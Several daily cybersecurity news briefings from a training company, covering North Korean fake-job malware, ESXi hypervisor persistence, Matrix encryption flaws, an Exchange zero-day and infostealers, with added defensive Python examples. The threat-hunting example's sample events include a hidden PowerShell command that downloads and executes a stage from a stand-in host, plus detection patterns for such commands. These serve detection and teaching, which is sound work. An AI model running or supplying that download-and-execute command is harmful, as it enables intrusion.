Les Bell and Associates Pty Ltd
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
More Fake Job Malmails Trigger 0day Malware
Researchers at ESET have uncovered a new set of malware tools being deployed by the North Korean APT Lazarus Group (a.k.a. HIDDEN COBRA, the group behind the Sony Pictures Entertainment breach and WannaCry). Most notable among these is the first observed in-the-wild exploitation of CVE-2021-21551, a vulnerability in Dell's DBUtil driver, which the attackers use to disable the monitoring performed by security products on compromised machines. The exploit uses techniques against the Windows kernel instrumentation APIs that have never been seen before, blinding the monitoring of low-level actions such as process creation and event tracing.
The delivery mechanism is the increasingly common one of fake job offers - in one case via LinkedIn messaging, in another via email. Opening the attached document triggers a chain of droppers, loaders, backdoors, uploaders and downloaders - in all cases, trojanized open-source projects which decrypt the embedded payload using block ciphers with long keys passed as command-line arguments.
Kálnai, Peter, Amazon-themed campaigns of Lazarus in the Netherlands and Belgium, ESET WeLiveSecurity blog, 30 September 2022. Available online at https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/.
Fake CISO Profiles on LinkedIn - Related?
In a possibly related story, blogger Brian Krebs has noted the creation of a large number of fake LinkedIn profiles for people occupying CISO positions at Fortune 500 companies. Krebs gives the example of a so-called 'Victor Sites' who claims to be CISO at Chevron; the real CISO is Christopher Lukas. However, a Google search for the CISO of Chevron returns Sites as the first result.
Compounding the problem, a number of magazine journalists and bloggers are accepting the fake profiles as truth and republishing their information. LinkedIn is working on taking the fake profiles down, but seems to need a more robust process for validating claimed positions.
However, with the current burst of malmails and phishes making use of phony job offers at major companies, including via LinkedIn messaging, one can't help wondering . . .
Krebs, Brian, Fake CISO Profiles on LinkedIn Target Fortune 500s, blog post, 29 September 2022. Available online at https://krebsonsecurity.com/2022/09/fake-ciso-profiles-on-linkedin-target-fortune-500s/.
Ransomware Demands - Damned If You Do, Damned If You Don't
Enterprises that fall victim to ransomware attacks are often faced with a bleak choice: pay the ransom demand to recover, or refuse. Refusal may mean significant cleanup, data recovery from backups and the possible loss of some data, but paying contributes funding to increasingly well-resourced gangs who can now afford to hire developers, buy 0day exploits and still live high on the hog, thereby making the problem worse and weakening our overall position.
The decision wasn't too hard in the early days, but the stakes have been raised by the now-ubiquitous ransomware that exfiltrates data before encrypting it. Not paying the ransom now risks the exposure of sensitive personal data and significant damage to lives, not just a financial hit. Governments have raised the possibility of making ransomware payments illegal, but cavil at the prospect of being blamed by an enterprise and its customers or patients who were legally blocked from forestalling a disastrous public exposure.
In the latest example, the Vice Society ransomware gang has published data exfiltrated from the Los Angeles Unified School District, which refused to pay the extortion demand, remaining "firm that dollars must be used to fund students and education" and pointing out that payment would not guarantee full recovery.
The 500 GB of data includes contact and legal documents, financial reports including bank account details, health information including COVID-19 test data, previous conviction reports and psychological assessments of students, according to TechCrunch.
Haber, Shannon, Los Angeles Unified Response on Cyberattack, press release, 30 September 2022. Available online at https://achieve.lausd.net/site/default.aspx?PageType=3&DomainID=4&ModuleInstanceID=4466&ViewID=6446EE88-D30C-497E-9316-3F8874B3E108&RenderLoc=0&FlexDataID=123107&PageID=1.
Carvalho, Alberto M., Thank you to our students, families and employees . . ., tweet, 3 October 2022. Available online at https://twitter.com/LAUSDSup/status/1576636549994717184.
Page, Carly, Hackers leak 500GB trove of data stolen during LAUSD ransomware attack, TechCrunch+, 3 October 2022. Available online at https://techcrunch.com/2022/10/03/los-angeles-school-district-ransomware-data/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
 Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
News Stories
New Malware Achieves Persistence in VMware ESXi Hypervisors
Mandiant has discovered a new family of malware which targets VMware ESXi hypervisors, Linux vCenter servers and Windows VMs. The malware allows a threat actor to:
- maintain persistent access to the hypervisor
- send commands to the hypervisor which will then be routed to the guest VM for execution
- transfer files between the hypervisor and guest machines
- tamper with logs on the hypervisor
- execute arbitrary commands from one guest to another guest on the same hypervisor.
It is important to note that this is a post-exploitation toolkit; the attacker has to use some other, as yet undetermined, exploit to gain admin access to the ESXi hypervisor. But once this has been done, they are likely to escape detection for a long time, due to the limited support for endpoint detection and response products on hypervisors.
In their reports, Mandiant identified two new malware families, VIRTUALPITA and VIRTUALPIE, which are installed as malicious vSphere Installation Bundles (VIBs) despite not being signed by VMware or any of its trusted partners. Another component, VIRTUALGATE, is installed on Windows VMs to enable communication via VMware's virtual machine communication interface (VMCI).
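As an added illustration of the kind of check Mandiant's second report argues for (this is our example code, not Mandiant's or VMware's tooling), the following Python script parses the fixed-width table printed by `esxcli software vib list` and flags any VIB whose acceptance level is below PartnerSupported or whose name is absent from a baseline captured from a known-good host of the same build. The sample table, the baseline and the two suspicious VIB names are constructed for the example; the table follows the column layout esxcli actually prints.

```python
"""Audit `esxcli software vib list` output for VIBs an ESXi host should not trust."""
import re
import sys
from dataclasses import dataclass

# ESXi acceptance levels, least to most trusted.
ACCEPTANCE_RANK = {"CommunitySupported": 0, "PartnerSupported": 1,
                   "VMwareAccepted": 2, "VMwareCertified": 3}

# Constructed sample in the fixed-width layout esxcli prints. The last two rows
# are hypothetical: a VIB that merely declares itself PartnerSupported, and one
# at the CommunitySupported level. Neither is a real Mandiant IOC.
_COLS = ("Name", "Version", "Vendor", "Acceptance Level", "Install Date")
_WIDTHS = (18, 36, 6, 18, 12)
_ROW = "  ".join("{:<%d}" % w for w in _WIDTHS)
_SAMPLE_ROWS = [
    ("esx-base", "6.7.0-3.159.19195723", "VMware", "VMwareCertified", "2022-02-01"),
    ("net-ixgbe", "3.7.13.7.14iov-20vmw.670.0.0.8169922", "VMW", "VMwareCertified", "2019-05-10"),
    ("vmtools", "10.3.10.12406962-11.0.0.8169922", "VMware", "VMwareCertified", "2022-02-01"),
    ("lsu-example-plugin", "1.0.0-1", "EXMPL", "PartnerSupported", "2022-09-20"),
    ("community-helper", "0.1-0", "Acme", "CommunitySupported", "2022-09-20"),
]
SAMPLE_VIB_LIST = "\n".join(
    [_ROW.format(*_COLS), _ROW.format(*("-" * w for w in _WIDTHS))]
    + [_ROW.format(*r) for r in _SAMPLE_ROWS])

# Hypothetical baseline: VIB names recorded from a known-good host of the same build.
BASELINE = {"esx-base", "net-ixgbe", "vmtools"}


@dataclass(frozen=True)
class Vib:
    name: str
    version: str
    vendor: str
    acceptance: str
    installed: str


def parse_vib_list(text: str) -> list[Vib]:
    """Parse the fixed-width table printed by `esxcli software vib list`.

    Column boundaries are taken from the dashed underline row, so the parser
    does not depend on values being free of spaces."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header, underline, rows = lines[0], lines[1], lines[2:]
    starts = [m.start() for m in re.finditer(r"-+", underline)]
    if len(starts) != 5:
        raise ValueError(f"expected 5 columns, found {len(starts)}")
    bounds = list(zip(starts, starts[1:] + [None]))

    def cells(row: str) -> list[str]:
        return [row[a:b].strip() for a, b in bounds]

    if cells(header) != list(_COLS):
        raise ValueError(f"unexpected header: {cells(header)}")
    return [Vib(*cells(r)) for r in rows]


def audit_vibs(vibs, baseline, minimum="PartnerSupported"):
    """Return (vib, reason) pairs that warrant a closer look."""
    findings = []
    floor = ACCEPTANCE_RANK[minimum]
    for v in vibs:
        if ACCEPTANCE_RANK.get(v.acceptance, -1) < floor:
            findings.append((v, f"acceptance level {v.acceptance} is below {minimum}"))
        if v.name not in baseline:
            # The level is self-declared in the VIB's descriptor, so an unknown
            # name matters even when the declared level looks respectable.
            findings.append((v, "not present in the known-good baseline"))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_VIB_LIST
    for vib, reason in audit_vibs(parse_vib_list(text), BASELINE):
        print(f"{vib.name:<20} {vib.vendor:<8} {vib.acceptance:<20} {reason}")
```

Run `esxcli software vib list > vibs.txt` on the host and pass the file as the first argument. Bear in mind that the acceptance level comes from the VIB's own descriptor, so a bundle whose descriptor has been edited to claim partner status passes the level check; the baseline comparison above, together with signature verification (`esxcli software vib signature verify` on recent ESXi releases), is what catches that case.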
The campaign is highly targeted and evasive, and while definitive attribution is not yet possible, the motive is probably cyber-espionage, and the threat actor possibly of Chinese origin.
Marvi, Alexander, Jeremy Koppen, Tufail Ahmed and Jonathan Lepore, Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors, Mandiant blog, 29 September 2022. Available online at https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence.
Marvi, Alexander and Greg Blaum, Bad VIB(E)s Part Two: Detection and Hardening within ESXi Hypervisors, Mandiant blog, 29 September 2022. Available online at https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening.
Threat Actor Dangles US, NZ Jobs to Deliver Cobalt Strike Beacons
Cisco Talos researchers have uncovered a threat actor sending malmails which lure recipients into opening a malicious MS Word document offering details of a job with either the US government or a trade union in New Zealand. If the recipient falls for the lure, the document attempts to exploit CVE-2017-0199, a remote code execution vulnerability, by downloading a malicious Word document template from a Bitbucket repository controlled by the attacker.
The downloaded .dotm template then executes an embedded VBA script; one variant deobfuscates and executes multiple Visual Basic and PowerShell scripts, while another downloads and runs an executable that runs malicious PowerShell commands. Ultimately it downloads and runs a leaked version of a Cobalt Strike beacon, configured to inject arbitrary binaries, although the Redline infostealer and Amadey botnet have also been seen as payloads.
Raghuprasad, Chetan and Vanja Svajcer, New campaign uses government, union-themed lures to deliver Cobalt Strike beacons, Talos Intelligence blog, 28 September 2022. Available online at https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html.
News Stories
Sophisticated Exploit PoC Breaks End-to-End Encryption in Matrix
Matrix is an open standard and suite of protocols which aim to make real-time communications, such as chat and teleconferencing, operate as transparently as email. A user with an account on any Matrix server, called their homeserver, can use these protocols to communicate across the entire Matrix ecosystem. Since messages will traverse untrusted servers, the specification enables end-to-end encryption by default, using the Olm and Megolm cryptographic ratchets, which are intended to provide forward secrecy.
Now, researchers at Royal Holloway, University of London, the University of Sheffield and Brave Software have published a paper revealing some subtle vulnerabilities in the implementations of these protocols in the matrix-react-sdk and matrix-js-sdk reference development libraries. Two of them are of critical severity.
In the first attack, a malicious homeserver can add users it controls to end-to-end encrypted rooms by spoofing room membership messages, which are not cryptographically authenticated in these protocols. Once added, those users can decrypt future messages sent in that room. In the second attack, the malicious homeserver adds a device it controls to another user's account in the room. Although the device will be labelled 'unverified', with a warning icon, for all users in the room, the damage is done: existing devices will already have shared their session data with the new device, allowing it to decrypt all future messages.
The Matrix project has released patches for the affected libraries (which not all Matrix implementations use) and users are advised to upgrade.
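To make the second attack concrete, here is an added toy model of a Megolm-style sender ratchet in Python. It is our illustration, not code from the Matrix SDKs: a single 32-byte HMAC-SHA256 ratchet stands in for Megolm's four-part ratchet, and an HMAC-derived keystream plus MAC stands in for Megolm's AES-CBC and HMAC. The point it demonstrates is the one the device-injection attack relies on: whatever state a device exports when it shares the session lets the recipient derive every later message key, while keys for messages sent before the share point cannot be recovered.

```python
"""Toy Megolm-style sender ratchet: forward secrecy, and what a shared session exposes."""
import hashlib
import hmac
import os
from dataclasses import dataclass


def _prf(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


@dataclass
class RatchetState:
    """Exported session: the ratchet value plus the message index it is valid from."""
    ratchet: bytes
    index: int

    def copy(self) -> "RatchetState":
        return RatchetState(self.ratchet, self.index)

    def advance(self) -> None:
        # One-way step: knowing R[i+1] does not reveal R[i].
        self.ratchet = _prf(self.ratchet, b"advance")
        self.index += 1

    def message_key(self) -> bytes:
        return _prf(self.ratchet, b"message-key")


def _keystream(key: bytes, length: int) -> bytes:
    blocks = (_prf(key, n.to_bytes(4, "big")) for n in range(length // 32 + 1))
    return b"".join(blocks)[:length]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Sender:
    def __init__(self) -> None:
        self.state = RatchetState(os.urandom(32), 0)

    def export(self) -> RatchetState:
        """What a device hands over when it shares the session with another device."""
        return self.state.copy()

    def encrypt(self, plaintext: bytes) -> tuple[int, bytes, bytes]:
        key = self.state.message_key()
        ct = _xor(plaintext, _keystream(key, len(plaintext)))
        msg = (self.state.index, ct, _prf(key, ct))   # (index, ciphertext, MAC)
        self.state.advance()                           # sender never keeps old keys
        return msg


class Receiver:
    def __init__(self, shared: RatchetState) -> None:
        self.state = shared.copy()

    def decrypt(self, msg):
        index, ct, tag = msg
        if index < self.state.index:
            return None           # before our share point: the ratchet cannot be reversed
        st = self.state.copy()
        while st.index < index:   # ratchet forward to the message's index
            st.advance()
        key = st.message_key()
        if not hmac.compare_digest(tag, _prf(key, ct)):
            return None           # tampered ciphertext
        return _xor(ct, _keystream(key, len(ct)))


def demo() -> dict:
    alice = Sender()
    bob = Receiver(alice.export())            # legitimate device, present from the start
    early = [alice.encrypt(f"message {i}".encode()) for i in range(3)]
    # A device injected into the room after message 2 receives the session as it
    # stands now (index 3), exactly as existing devices would share it.
    rogue = Receiver(alice.export())
    later = [alice.encrypt(f"message {i}".encode()) for i in range(3, 6)]
    idx, ct, tag = later[0]
    tampered = (idx, bytes([ct[0] ^ 1]) + ct[1:], tag)
    return {
        "bob_reads_all": all(bob.decrypt(m) is not None for m in early + later),
        "rogue_reads_past": [rogue.decrypt(m) for m in early],
        "rogue_reads_future": [rogue.decrypt(m) for m in later],
        "tampered_rejected": rogue.decrypt(tampered) is None,
    }


if __name__ == "__main__":
    print(demo())
```

The ratchet gives forward secrecy against a device that joins late, which is exactly why the warning icon does not help: the injected device is not trying to read history, and the session it was handed already covers everything the sender will say from that point on.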
Albrecht, Martin R, Sofía Celi, Benjamin Dowling, and Daniel Jones, Practically-Exploitable Cryptographic Vulnerabilities in Matrix, preprint, undated. Available online at https://nebuchadnezzar-megolm.github.io/.
Hodgson, Matthew, et al., Upgrade now to address E2EE vulnerabilities in matrix-js-sdk, matrix-ios-sdk and matrix-android-sdk2, blog post, 28 September 2022. Available online at https://matrix.org/blog/2022/09/28/upgrade-now-to-address-encryption-vulns-in-matrix-sdks-and-clients.
Admin Pleads Guilty to Sabotaging Former Employer
An admin who had worked for a major Hawaii-based finance sector company has pleaded guilty to sabotaging his former employer's network. Casey K. Umetsu worked for the firm between 2017 and 2019 as a network administrator, but shortly after leaving their employ, he used his credentials to access an admin dashboard and made numerous changes, including redirecting web and email traffic to external machines - effectively a denial of service. He also locked other administrators out of the dashboard so that they could not resolve the problem for several days.
His plan was to convince the company to hire him back at a higher salary - but the company contacted the FBI, who tracked him down, and he now faces a maximum sentence of 10 years in prison and a fine of up to $US250,000, which counts as a spectacular CLM (Career Limiting Move).
Of course, there's a lesson here for all of us, although the former employer paid a high price for it: have a procedure to rapidly revoke the access of highly-privileged employees (admittedly easier to say than to do).
Enoki, Elliot, Honolulu Man Pleads Guilty to Sabotaging Former Employer's Computer Network, US Attorney's Office, District of Hawaii, US Department of Justice, 28 September 2022. Available online at https://www.justice.gov/usao-hi/pr/honolulu-man-pleads-guilty-sabotaging-former-employer-s-computer-network.
Microsoft Eyes North Korean Hackers Weaponizing Open Source
Over the last few months, Microsoft's Threat Intelligence Center has been tracking an actor it labels ZINC (also known as Labyrinth Chollima and Black Artemis) using social engineering attacks against employees in media, defence, aerospace and IT in the US, UK, India and Russia. The attacker starts with LinkedIn connections as a way to build trust with victims, then switches to communication via WhatsApp, which it uses to deliver its payloads under the lure of employment.
The payloads are weaponized versions of popular open-source programs including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader and others, and the embedded payload is an obfuscated variant of the ZetaNile malware. This relates to a similar campaign reported by Mandiant earlier this month.
ZINC's goals are cyberespionage and theft of corporate data, but this attacker will also settle for personal data, financial gain and network disruption.
MSTIC and LinkedIn Threat Prevention and Defense, ZINC weaponizing open-source software, blog post, 29 September 2022. Available online at https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/.
News Stories
Multi-Platform, Multi-Function Malware
Black Lotus Labs has released their analysis of a new malware sample christened 'Chaos' by its developers, who seem to be Chinese. Chaos is written in the Go programming language, and has been designed to operate on both Windows and Linux systems on multiple different architectures, including Intel/AMD, ARM and PowerPC. 
Once Chaos is installed on a device, it establishes persistence and then opens a UDP port from which it makes initial contact with a C2 server, sending the OS version and platform. On Windows, it will create a registry key and copy itself into another directory. It follows this by establishing a TLS connection with the C2 server and collecting additional information about the system it has infected.
From here, it receives staging commands, which use another port to download additional files that it goes on to use in obtaining SSH connections to new hosts, whether using keys it found on the infected host, by brute forcing, or by using keys it downloads. It may also download a file containing passwords likely to succeed.
If it manages to break into another system, it contacts yet another C2 server which carries copies of Chaos compiled for all useful combinations of OS and platform.
Infected systems will also receive any of 70 additional commands which might further exploit the current system, open a reverse shell, run scripts to exploit known CVE vulnerabilities on other machines, launch DDoS attacks or start cryptomining using the xmrig Monero miner.
Black Lotus Labs, Chaos Is A Go-based Swiss Army Knife of Malware, Lumen blog, 28 September 2022. Available online at https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/.
Brute Ratel Red-Team Toolkit Cracked, Shared By Threat Actors
In red-team penetration testing, the whole idea is for the red team to document their exploits as they twist and pivot inside the defenders' network, so that they can share this information with the blue team in order to improve their defensive controls and their incident response procedures and playbooks. A popular framework for this purpose is Brute Ratel, a post-exploitation toolkit that works by installing agents called badgers on network devices and using them to run attacks while evading IDS, EDR and AV products. As it does this, it records its progress, generating a timeline and graph of each attack for use in subsequent analysis.
So far, so good. But now a threat actor has cracked the licence protection in Brute Ratel, so that it can be installed and run without an activation key, and as word spreads in underground forums, it is likely that cybercrime groups have gained access to the tool, or very soon will. The problem is that one of Brute Ratel's key strengths is its ability to generate novel shellcode which existing EDR and AV products cannot detect, since the shellcode is unique each time and so matches no existing IOC.
Brute Ratel now joins Cobalt Strike as a legitimate red-team tool that has fallen into the wrong hands.
BushidoToken, Brute Ratel cracked and shared across the Cybercriminal Underground, blog post, 28 September 2022. Available online at https://blog.bushidotoken.net/2022/09/brute-ratel-cracked-and-shared-across.html.
Microsoft Exchange RCE 0day Active in the Wild
Vietnamese security firm GTSC is warning of an extensive campaign which targets Microsoft Exchange servers via two previously undiscovered vulnerabilities. GTSC reported them to Microsoft via the Zero Day Initiative, but the Redmond company is yet to publicly acknowledge them and they do not yet have CVE numbers. ZDI has verified the bugs and assigned CVSS scores of 8.8 and 6.3; chained together, they lead to remote code execution.
The attack was revealed when GTSC observed IIS log entries which looked similar to those produced by ProxyShell exploitation, and with a little analysis their red team figured out how to access the Exchange back end and achieve RCE.
Tracing through the logs, they also found that the exploit was followed by information collection and the installation of China Chopper web shells, which seem to be managed using AntSword, a Chinese open-source website administration tool that supports web shell management.
Although they do not wish to release technical details, GTSC have provided a temporary mitigation in the form of a request-blocking rule in the IIS URL Rewrite module on the Exchange front end.
GTSC Team, Warning: New Attack Campaign Utilized a New 0-Day RCE Vulnerability on Microsoft Exchange Server, blog post, 28 September 2022. Available online at https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html.
Former eBay Execs Get Jail Time for Harassment
Two former security executives at eBay Inc have been sentenced to prison for their part in a campaign of harassment and intimidation directed at a Massachusetts couple whose eCommerce newsletter had annoyed then-CEO Devin Wenig.
Jim Baugh, former senior director of safety and security, and David Harville, former director of global resiliency received sentences of 57 months and 24 months respectively, along with fines of $US40,000 and $US20,000, after pleading guilty to cyberstalking-related charges.
The campaign began after Wenig, annoyed by comments critical of eBay in the newsletter of David and Ina Steiner, texted another executive that it was time to "take her down". In the campaign that followed the couple were subjected to anonymous harassing tweets, bizarre emails and creepy package deliveries such as spiders, cockroaches, a funeral wreath, a bloody Halloween pig mask and a book on how to survive the death of a spouse.
Seven eBay employees were charged in connection with the campaign, although Wenig, who has said he had "absolutely zero knowledge" of the actions that followed, was not. A civil suit by the Steiners remains pending.
Raymond, Nate, Ex-eBay execs heading to prison for harassing couple behind newsletter, Reuters, 30 September 2022. Available online at https://www.reuters.com/world/us/ex-ebay-exec-heading-prison-harassing-couple-behind-newsletter-2022-09-29/.
News Stories
New Campaign Targets US Defence Contractors
Security researchers at Securonix have uncovered a sophisticated attack campaign directed at multiple military and weapons contractors, including a likely supplier to the F-35 Lightning II fighter program. The initial compromise is achieved by a spear-phishing malmail carrying a shortcut file with a seductive name like 'Company & Benefits.pdf.lnk'. This uses the forfiles command to stealthily launch a PowerShell script which repeatedly attempts to connect to a C2 server in order to fetch the next of seven stages of downloaded scripts that complete the infection.
The multiple-stage infection process employs many aggressive anti-analysis techniques; for example, if it detects that it is being executed in a virtualization sandbox, it disables networking on the system, deletes all the user files it can find, and then shuts the machine down. Of particular interest is that if the system language is Chinese or Russian, it simply exits after initiating a shutdown.
Along the way, the different stages contact a variety of C2 servers which are themselves hidden behind a Cloudflare front end that also provides CDN services and TLS encryption. The Securonix blog article provides a comprehensive analysis including IOCs and threat hunting queries.
Iuzvyk, D., T. Peck and O. Kolesnikov, Securonix Threat Labs Security Advisory: Detecting STEEP#MAVERICK: New Covert Attack Campaign Targeting Military Contractors, blog post, September 2022. Available online at https://www.securonix.com/blog/detecting-steepmaverick-new-covert-attack-campaign-targeting-military-contractors/.
Auth0 Code Compromised, Somehow
Authentication service provider Auth0, now a subsidiary of Okta, has disclosed that a third party has somehow acquired a copy of some Auth0 code repositories, dated October 2020. However, an extensive investigation conducted by both the company itself and a DFIR consultancy found no evidence of unauthorized access to its environments, and no evidence of any data exfiltration.
Although the mechanism of the breach remains a mystery, the company has notified law enforcement and taken additional steps to ensure the code cannot be used to compromise any accounts.
Uncredited, Auth0 Code Repository Archives From 2020 and Earlier, blog post, 26 September 2022. Available online at https://auth0.com/blog/auth0-code-repository-archives-from-2020-and-earlier/.
Facebook Shutters Chinese, Russian Disinformation Networks
Facebook parent company Meta has disclosed actions it has taken to shut down two unconnected networks - one Chinese, one Russian - which were violating the firm's policy against what it terms 'coordinated inauthentic behaviour'. 
The Chinese-origin operation targeted primarily the US and Czechia (the Czech Republic), posting on Facebook, Instagram, Twitter and two petition platforms in Czechia. Its focus was to influence US voters of all political stripes ahead of the upcoming midterm elections, and also to influence Czechia's foreign policy towards China and Ukraine.
The Russian network focused on Germany, France, Italy, Ukraine and the UK with narratives on the Ukraine conflict and its impact in Europe. This was a large and complex campaign which used sock puppet accounts on Facebook, Instagram, LiveJournal, YouTube, Telegram, Twitter, Change.org and Avaaz to direct readers to a network of over 60 web sites impersonating legitimate news organizations such as The Guardian and Der Spiegel.
The full 30-page report includes IOCs; for social media users the obvious lesson is to check the URL bar after following a link from a post, to make sure you are looking at the real news site.
Nimmo, Ben and David Agranovich, Removing Coordinated Inauthentic Behavior From China and Russia, news release, Meta, 27 September 2022. Available online at https://about.fb.com/news/2022/09/removing-coordinated-inauthentic-behavior-from-china-and-russia/.
Nimmo, Ben and Mike Torrey, Taking down coordinated inauthentic behavior from Russia and China, Detailed Report, September 2022. Available online from https://about.fb.com/wp-content/uploads/2022/09/CIB-Report_-China-Russia_Sept-2022-1-1.pdf.
"Quantum Builder" Shortcuts Used to Deliver RATs
A new campaign is using a tool called "Quantum Builder" to generate malicious Windows shortcut and similar files in order to deliver the Agent Tesla keylogger RAT to victims.
Quantum Builder, which has been linked to the Lazarus Group APT, can generate malicious .lnk, .hta and PowerShell payloads which use multiple stages to deliver Agent Tesla. The payloads use a variety of sophisticated techniques:
- User Account Control bypass
- Multi-stage infection chain making use of LOLBins
- In-memory execution of PowerShell scripts
- Execution of decoys to distract victims post-compromise
Zscaler ThreatLabz, who discovered the campaign, say they are unable to make a confident attribution at this stage, but have provided a full analysis in their report.
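The STEEP#MAVERICK chain above (a double-extension .pdf.lnk that uses forfiles to launch a hidden PowerShell downloader) and the Quantum Builder chain (.lnk and .hta payloads, LOLBins, in-memory PowerShell) have the same observable shape on an endpoint. As an added example (our code, not Securonix's or Zscaler's hunting queries), the following Python rules run over a handful of constructed Sysmon-style events, simplified to the fields the rules need; the file names, user name and C2 host are invented.

```python
"""Hunt constructed Sysmon-style events for LNK/LOLBin infection chains."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Hit:
    rule: str
    event: int   # index into the event list


# Constructed events (simplified Sysmon fields: id 1 = process creation,
# id 11 = file creation). Paths, user names and the C2 host are invented.
SAMPLE_EVENTS = [
    {"id": 11, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "target": r"C:\Users\jdoe\AppData\Local\Temp\Company & Benefits.pdf.lnk"},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c forfiles /p C:\Windows\System32 /m notepad.exe /c "powershell -w hidden -nop -c iex($env:stage)"'},
    {"id": 1, "image": r"C:\Windows\System32\forfiles.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'forfiles /p C:\Windows\System32 /m notepad.exe /c "powershell -w hidden -nop -c iex($env:stage)"'},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r"powershell -w hidden -nop -c iex((New-Object Net.WebClient).DownloadString('https://c2.example/stage2'))"},
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Users\jdoe\AppData\Local\Temp\invoice.hta"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"id": 11, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "target": r"C:\Users\jdoe\Downloads\quarterly-report.pdf"},
]

LOLBIN_LAUNCHERS = {"forfiles.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                    "rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Document-looking name with an executable extension behind it.
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|txt)\.(?:lnk|hta)$", re.I)
# forfiles /c "<command>" runs the command once per matched file: a command proxy.
FORFILES_PROXY = re.compile(r'\bforfiles\b.*?/c\s+"?(?:powershell|pwsh|cmd)', re.I)
PS_EVASION = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b|-nop\b|\biex\b|"
    r"invoke-expression|downloadstring|frombase64string", re.I)
USER_WRITABLE_HTA = re.compile(r"\\(?:users|programdata|temp)\\.*\.hta\b", re.I)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def double_extension_shortcut(e) -> bool:
    return e["id"] == 11 and bool(DOUBLE_EXT.search(e.get("target", "")))


def lolbin_spawns_script_host(e) -> bool:
    return (e["id"] == 1 and _base(e.get("parent", "")) in LOLBIN_LAUNCHERS
            and _base(e["image"]) in SCRIPT_HOSTS)


def forfiles_command_proxy(e) -> bool:
    return e["id"] == 1 and bool(FORFILES_PROXY.search(e.get("cmdline", "")))


def powershell_evasion_switches(e) -> bool:
    return (e["id"] == 1 and _base(e["image"]) in {"powershell.exe", "pwsh.exe"}
            and bool(PS_EVASION.search(e.get("cmdline", ""))))


def hta_from_user_writable_path(e) -> bool:
    return (e["id"] == 1 and _base(e["image"]) == "mshta.exe"
            and bool(USER_WRITABLE_HTA.search(e.get("cmdline", ""))))


RULES = [double_extension_shortcut, lolbin_spawns_script_host, forfiles_command_proxy,
         powershell_evasion_switches, hta_from_user_writable_path]


def hunt(events) -> list[Hit]:
    """Run every rule over every event; hits come back in event order."""
    return [Hit(rule.__name__, i) for i, e in enumerate(events) for rule in RULES if rule(e)]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        e = SAMPLE_EVENTS[hit.event]
        print(f"[{hit.rule}] event {hit.event}: {e.get('cmdline') or e.get('target')}")
```

The benign events at the end (a scheduled script run from explorer.exe and an ordinary PDF save) produce no hits, which is the check worth keeping as you tune these rules against your own fleet's baseline. Note that the forfiles rule fires on both the cmd.exe launcher and the forfiles.exe process itself; deduplicating on the parent chain is a reasonable next step once process GUIDs are available.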
Zscaler ThreatLabz, Agent Tesla RAT Delivered by Quantum Builder With New TTPs, blog post, 27 September 2022. Available online at https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps.
News Stories
Powerful Infostealer for Rent
Since late July, a Russian-speaking malware developer has been offering an extremely sophisticated infostealer, called Erbium, on a dark web forum. The author claims that it is the best on the market, having taken several months to develop, and this is perhaps reflected in the fact that the asking price for one year of the service has risen from $150 to $1,000, including technical support and updates (still considerably less than comparable infostealers).
Erbium has a vast range of capabilities, from system info enumeration to the ability to collect user credentials from web browsers, chat and email programs. It can also capture cryptocurrency wallet information (including login credentials and stored funds) and can collect multi-factor authentication information as well as the content of password safe programs.
The malware uses extensive evasion techniques: it is polymorphic and uses XOR encryption to obfuscate the ErbiumStealer.dll second stage, which it downloads from a C2 server. Its control panel communicates over a Telegram channel. Erbium has now been observed and analyzed by both Cluster25 and Cyfirma.
Cluster25 Threat Intel Team, Erbium InfoStealer Enters the Scene: Characteristics and Origins, blog post, 15 September 2022. Available online at https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer.
